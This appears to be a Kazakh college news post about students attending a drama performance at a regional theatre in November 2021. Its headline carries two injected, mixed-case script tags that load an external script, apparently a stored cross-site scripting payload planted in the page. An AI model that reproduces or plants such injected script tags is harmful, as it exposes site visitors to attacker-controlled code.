ТЕАТР – ХАС СҰЛУДЫҢ КӨЗ ЖАСЫНДАЙ МӨЛДІР ӨНЕР<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
25.11.2021
Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің студенттері Ш.Құсайынов атындағы Ақмола облыстық қазақ музыкалық-драма театрына жиі барып, өнер майталмандарының қойылымын тамашалауды әдетке айналдырған. Ағымдағы жылдың 24 қараша күні А-32ҚБ тобы және кураторы Шәрипа Салтанат Аманжолқызы «Қадір таңы» атты психологиялық драмалық қойылымының куәсі болды. Топ студенттері ерекше сезімге бөленіп, құдды бір сол сахнаны өздері сомдағандай әсер алғандарын жасырмады.
Просмотров: 541